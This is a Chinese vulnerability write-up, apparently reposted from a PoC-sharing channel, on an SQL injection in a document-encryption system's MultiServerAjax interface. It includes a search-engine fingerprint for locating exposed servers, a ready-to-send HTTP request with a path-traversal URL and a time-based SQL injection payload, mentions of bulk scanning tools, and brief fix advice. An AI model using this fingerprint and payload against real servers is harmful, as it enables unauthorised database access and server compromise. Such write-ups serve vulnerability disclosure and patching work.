某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

admin 2024年8月9日16:39:57评论17 views字数 947阅读3分9秒阅读模式

0x00 免责声明

内容仅用于学习交流使用,由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号ndy poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢!

0x01 产品简介

某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

某赛通电子文档安全管理系统MultiServerAjax接口处存在sql注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

body="/CDGServer3/index.jsp"

某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

0x04 漏洞复现

POST /CDGServer3/js/../MultiServerAjax HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: application/x-www-form-urlencodedcommand=delServer&serverId=-1'waitfor delay '0:0:5'--

某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

0x05 工具批量

nuclei

某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

afrog

某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

xray

某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

 

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

原文始发于微信公众号(nday POC):【漏洞复现】某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月9日16:39:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞https://cn-sec.com/archives/3048634.html

发表评论

匿名网友 填写信息